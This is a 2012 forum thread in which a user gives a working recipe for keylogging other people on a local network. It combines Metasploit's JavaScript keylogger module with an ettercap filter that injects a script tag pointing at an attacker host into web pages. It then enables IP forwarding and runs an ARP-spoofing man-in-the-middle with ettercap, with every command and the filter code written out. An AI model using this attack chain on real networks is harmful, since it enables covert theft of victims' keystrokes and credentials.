Diggs Posted February 6, 2012 Author Share Posted February 6, 2012 Ach, now it's been moved to the unstable branch. Quote Link to comment Share on other sites More sharing options...
Diggs Posted April 4, 2012 Author Share Posted April 4, 2012 I've spent a bit of time working on the Middler issues for a while and haven't gotten to the bottom of them. The python parsing is both slow and mildly buggy and the results just haven't shown up for a standalone application which can accomplish what I was hoping for. In the meantime, I found that the Metasploit http_javascript_keylogger has been added back to the stable branch. Combined with some good ettercap filters, you can append either the Java modules or the keylogger script and it's much, much faster. First, we need to generate the Javascript Keylogger and set up a handler in Metasploit for it. This is under use auxiliary/server/capture/http_javascript_keylogger For some more details on using the module, look here: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger Setting this up properly will set up the javascript in a random folder under /var/www and create a handler for the returned characters. The next step is to insert it into the stream. The ettercap filter I have been playing with looks like this: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "</head>")) { replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> "); } if (search(DATA.data, "</HEAD>")) { replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> "); } } The qZBRDzd/test.js is the file which is created from the Metasploit module. This can be compiled with etterfilter: etterfilter jsEmbed.filter -o jsEmbed.ef So, we've got a filter that will insert the javascript src right after the head of a document. We now need to run ettercap and MITM the network. You will need to set up ip_forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward And make sure ettercap is set up in etter.conf to handle iptables. Look that part up if you are new to it. Now run ettercap: ettercap -T -q -F jsEmbed.ef -M ARP // // With this setup, I've found what I originally wanted in the Middler and also used a couple of well known and stable products instead of a one-off demo for a con. If there are any fun ideas or improvements, let me know. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.